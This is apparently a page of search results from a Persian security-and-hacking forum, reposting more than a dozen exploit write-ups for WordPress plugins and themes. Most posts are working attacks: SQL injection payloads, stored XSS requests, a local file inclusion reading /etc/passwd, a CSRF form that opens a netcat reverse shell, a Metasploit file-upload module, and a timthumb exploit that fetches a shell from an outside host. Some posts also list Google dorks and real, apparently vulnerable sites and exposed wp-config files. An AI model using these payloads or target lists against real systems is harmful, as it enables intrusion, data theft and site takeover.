رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'wordpress'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

54 نتیجه پیدا شد

  1. # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection # Date: 2018-09-09 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: Windows 10 # CVE: N\A # Description # The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. # PoC # Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering. # Answer that question. # Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, # and change it with the payload showed below; ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] # It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result # of the query. When you make it 1=1, you should see a question from firt record. # Therefore OR statement must be returned False. # Step 3. Reload the page. Open the source code of the page. Search "sss_params". # You will see the version of DB in value of sss_params parameter. # The Request Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # The result from source code of the page <script type='text/javascript'> /* <![CDATA[ */ var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"}; /* ]]> */ </script> DB version: "10.1.36-MariaDB-1~trusty"....
  2. <!-- About: =========== Component: Plainview Activity Monitor (Wordpress plugin) Vulnerable version: 20161228 and possibly prior Fixed version: 20180826 CVE-ID: CVE-2018-15877 CWE-ID: CWE-78 Author: - LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre) Timeline: =========== - 2018/08/25: Vulnerability found - 2018/08/25: CVE-ID request - 2018/08/26: Reported to developer - 2018/08/26: Fixed version - 2018/08/26: Advisory published on GitHub - 2018/08/26: Advisory sent to bugtraq mailing list Description: =========== Plainview Activity Monitor Wordpress plugin is vulnerable to OS command injection which allows an attacker to remotely execute commands on underlying system. Application passes unsafe user supplied data to ip parameter into activities_overview.php. Privileges are required in order to exploit this vulnerability, but this plugin version is also vulnerable to CSRF attack and Reflected XSS. Combined, these three vulnerabilities can lead to Remote Command Execution just with an admin click on a malicious link. References: =========== https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/ PoC: --> <html> <!-- Wordpress Plainview Activity Monitor RCE [+] Version: 20161228 and possibly prior [+] Description: Combine OS Commanding and CSRF to get reverse shell [+] Author: LydA(c)ric LEFEBVRE [+] CVE-ID: CVE-2018-15877 [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /> <input type="hidden" name="lookup" value="Lookup" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  3. # Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting # Google Dork: inurl:"/wp-content/plugins/jibu-pro" # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip # Version: 1.7 # Tested on: Kali Linux # CVE: N/A # Description: Jinu Pro is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Login as a user who have access to Jibu Pro plugin. # 2) Jibu-Pro --> Create Quiz. # 3) At the Quiz Name type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number]) # 4) Click Create New Questions, fill the fields and click Save. # 5) Copy the Shortcode [Test Number] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 512 name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save
  4. # Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/quizlord.zip # Version: 2.0 # Tested on: Kali Linux # CVE: N/A # Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: title # 1) Login as a user who have access to Jibu Pro plugin. # 2) Quizlord --> Add a Quiz. # 3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"]) # 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-admin/admin.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 188 action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save
  5. Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2018-08-22 CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009] Download Site: https://wordpress.org/plugins/bft-autoresponder/ Vendor: Kiboko Labs https://calendarscripts.info/ Vendor Notified: 2018-08-22, Fixed v2.5.1.5 Vendor Contact: @prasunsen wordpress.org Advisory: http://www.vapidlabs.com/advisory.php?v=203 Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date. Vulnerability: These vulnerabilities require administrative priveledges to exploit. CVE-2018-1002000 There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. In line 69 of file controllers/list.php: 65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")"); del_ids is not sanitized properly. Nine Reflected XSS. CVE-2018-1002001 In line 22-23 of controllers/list.php: 22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob']; 23 echo "<meta http-equiv='refresh' content='0;url=$url' />"; CVE-2018-1002002 bft_list.html.php:28: <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div> CVE-2018-1002003 bft_list.html.php:29: <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div> CVE-2018-1002004 bft_list.html.php:42: <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>"> CVE-2018-1002005 bft_list.html.php:43: <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div> CVE-2018-1002006 integration-contact-form.html.php:14: <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p> CVE-2018-1002007 integration-contact-form.html.php:15: <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p> CVE-2018-1002008 list-user.html.php:4: <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p> CVE-2018-1002009 unsubscribe.html.php:3: <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p> Exploit Code: SQL Injection CVE-2018-1002000 $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql Where post_data is: POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1 Host: example.com Connection: keep-alive Content-Length: 150 Cache-Control: max-age=0 Origin: http://example.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http] (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http] --- [11:50:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12 [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47' [*] shutting down at 11:50:08 CVE-2018-1002001 http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  6. # Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion # Author: Manuel Garcia Cardenas # Date: 2018-09-19 # Software link: https://es.wordpress.org/plugins/localize-my-post/ # CVE: 2018-16299 # DESCRIPTION # This bug was found in the file: /localize-my-post/ajax/include.php # include($_REQUEST['file']); # The parameter "file" it is not sanitized allowing include local files # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. # Local File Inclusion POC: GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
  7. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arash Khazaei', # EDB PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'EDB', '37998' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Responsive Thumbnail Slider Plugin v1.0', { } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 28 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]), OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]), OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ]) ]) end def check # The version regex found in extract_and_check_version does not work for this plugin's # readme.txt, so we build a custom one. check_code = check_version || check_plugin_path if check_code return check_code else return CheckCode::Safe end end def check_version plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.body && res.body =~ /Version:([\d\.]+)/ version = Gem::Version.new($1) if version <= Gem::Version.new('1.0') vprint_status("Plugin version found: #{version}") return CheckCode::Appears end end nil end def check_plugin_path plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.code == 200 vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected') return CheckCode::Detected end nil end def login auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD']) return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies) print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}") auth_cookies end def upload_payload(cookies) manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management' file_payload = get_write_exec_payload(:unlink_self => true) file_name = "#{rand_text_alpha(5)}.php" # attempt to access plugins page plugin_res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies ) unless plugin_res && plugin_res.body.include?("tmpl-uploader-window") fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page") end data = Rex::MIME::Message.new data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"") data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"") data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"") post_data = data.to_s # upload the file upload_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'), 'cookie' => cookies, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies) fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/) retrieve_file(page, cookies) end def retrieve_file(res, cookies) fname = res.body.scan(/slider\/(.*\.php)/).flatten[0] fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil? file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}") print_good("Successful upload") send_request_cgi( 'uri' => file_uri, 'method' => 'GET', 'cookie' => cookies ) end def exploit unless check == CheckCode::Safe auth_cookies = login upload_payload(auth_cookies) end end end
  8. # Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting # Date: 2018-10-16 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://schiocco.com/ # Software Link : https://board.support/ # Software : Support Board - Chat And Help Desk # Version : v1.2.3 # Vulernability Type : Code Injection # Vulenrability : HTML Injection and Stored XSS # CVE : N/A # In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress, # a Stored XSS vulnerability has been discovered in file upload areas in the # Chat and Help Desk sections via the msg parameter # in a /wp-admin/admin-ajax.php sb_ajax_add_message action. # HTTP POST Request : [Stored XSS] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/chat/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 450 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang= # In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin, # the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and # file upload areas in the Chat and Help Desk sections of Schiocco. # HTTP POST Request : [HTML Injection] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/desk-demo/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 288 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
  9. # Exploit Title: WordPress aio-shortcodes Plugin - Remote Code Execution # Google Dork: Index of /wp-content/plugins/aio-shortcodes # Exploit: timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php # Date: 26 Oktober 2018 # Author: L4663r666h05t # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.x.x # Screenshot: http://prntscr.com/lahts7 # Tested on: Windows 10 Pro (x64) Versions Affected: 1.x.x Live Site: http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php Your Shell: http://localhost/wp-content/plugins/aio-shortcodes/cache/md5.php http://localhost/wp-content/plugins/aio-shortcodes/cache/shell.php
  10. |[+] Exploit Title: Web Design in Victoria BC | WordPress Websites | IdeaZone.ca SQL Injection Vulnerability |[+] Date:22/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:https://www.ideazone.ca/ |[+] dork: intext:© Copyright - IdeaZone.ca inurl:.php?Id= |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : inj3ct0r Anonysec hackers iran team |[+] Vulnerability Type :SQL Injection |[+] Severity Level :Med. |[+] Exploit :info SQL Injection Vulnerability -------------->.php?id= ***************************************************************| Google Search intext:Custom Web Development & WebSite Design by Dizyn inurl:.php?Id= You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL Injection Vulnerability --------------> .php?id= ***************************************************************| RHG Team hackers |--------------------------------------------------------------| SQL Injection Vulnerability http://www.infotechvi.com/exit.php?companyID=2027 **************************************************************** Discovered by : Inj3ct0r | Rednofozi RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2187
  11. |[+] Exploit Title: WordPress define AUTH_KEY configurations Vulnerability |[+] Date:17/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:https://time.ly |[+] dork: inurl:intext:define('AUTH_KEY', ' wp-config.php filetype:txt |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Rednofozi Anonysec hackers iran team |[+] Vulnerability Type :database for WordPress Vulnerability |[+] Severity Level :Med. |[+] Exploit :info -------------->wp-config.php ***************************************************************| |[+] dork:inurl:intext:define('AUTH_KEY', ' wp-config.php filetype:txt ################################################################ ----------------------------------------------------------------------------------- WordPress configurations Vulnerability https://time.ly/wp-content/uploads/2014/08/wp-config-php.txt https://thimpress.com/wp-content/uploads/2016/12/wp-config.txt https://www.tibetangeeks.com/technologies/web_development/cms/wordpress/02b-install_and_build-details/wp-config-the_canonical-php.txt https://jason.pureconcepts.net/downloads/wp-config.php.txt https://www.oceanagrill.com/wp-content/uploads/file-manager/log.txt https://thimpress.com/wp-content/uploads/2016/12/wp-config.txt https://voila.edu.pl/wp-content/uploads/2015/09/wp-config-backup.txt---------------->http://www.zone-h.org/mirror/id/31722197 About 5,280 results The End , Enjoy Of Hacking ...! ---------------------------------------------------------------------------------- |--------------------------------------------------------------| my name is Inj3ct0r Red Hat's hackers ********************************************************************** http://www.exploit4arab.org/exploits/2165
  12. |[+] Exploit Title:Wordpress wp-content plugins (mingle-forum)- SQL Injection Vulnerability |[+] Date:15/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: Wordpress.org |[+] dork: inurl:wordpress/wp-content/plugins/mingle-forum |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Rednofozi Anonysec hackers iran team |[+] Vulnerability Type :SQL Injection Vulnerability |[+] Severity Level :Med. |[+] Exploit :info SQL Injection -------------->wpf-edit-profile.php ***************************************************************| Google Search inurl:wordpress/wp-content/plugins/mingle-forum Fatal error: Call to undefined function wp_die() in SQL Injection -------------->wpf-edit-profile.php ***************************************************************| RHG Team hackers Fatal error: Call to undefined function wp_die() in /home/scma/public_html/wordpress/wp-content/plugins/mingle-forum/wpf-edit-profile.php on line 11 |--------------------------------------------------------------| SQL Injection Vulnerability https://sc-ma.com/wordpress/wp-content/plugins/mingle-forum/wpf-edit-profile.php http://students.washington.edu/costume/wordpress/wp-content/plugins/mingle-forum//wpf-edit-profile.php https://boomerden.com/wordpress/wp-content/plugins/mingle-forum//wpf-edit-profile.php About 202 results for Attek http://www.exploit4arab.org/exploits/2149
  13. Rednofozi

    Scanners WPSeku – WordPress Security Scanner

    WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues. Installation $ git clone GitHub - m4ll0k/WPSeku: WPSeku - Wordpress Security Scanner wpseku $ cd wpseku $ pip install-r requirements.txt $ python wpseku.py Usage python wpseku.py - target http://site.com - drag Credits and Contributors Original idea and script from WPScan Team (https://wpscan.org/) WPScan Vulnerability Database (https://wpvulndb.com/api)
  14. # Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.'' # Exploit HTML Code : <title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title> <form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data"> <body background=" "> <input type="file" name="file" id="file"><br> <input name="form_id" value="../../../" type=hidden"> <input name="name" value="kingskrupellos.html" type=''hidden"> <input name="gform_unique_id" value="../../" type="hidden"> <input name="field_id" value="" type="hidden"> <input type="submit" name="gform_submit" value="submit"> </form> [img=http://www.imageupload.co.uk/images/2018/06/08/gravityphp5athemes.png] Exploit : TARGET/?gf_page=upload We cannot upload directly with this exploit. But we can upload our file to the site with remote file exploiter. # Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}} [img=http://www.imageupload.co.uk/images/2018/06/08/miplantest1.png] # Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}} [img=http://www.imageupload.co.uk/images/2018/06/08/miplantest2.png] # Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf # You don't need to change your filename as _input__kingskrupellos.php5 like this. # Just choose a file from your machine and upload it with the beforementioned extensions. # For example : yourfilename.php file will upload to the server [ site ] like this. /_input__kingskrupellos.php5 # Example Usage for Windows : # Use with XAMPP Control Panel and your Localhost. # Use from htdocs folder located in XAMPP # 127.0.0.1/athemeswordpressexploiter.html # Path : TARGET/_input__kingskrupellos.php5 [img=http://www.imageupload.co.uk/images/2018/06/08/Screenshot_1.png] ################################################################################################# # Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ] ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
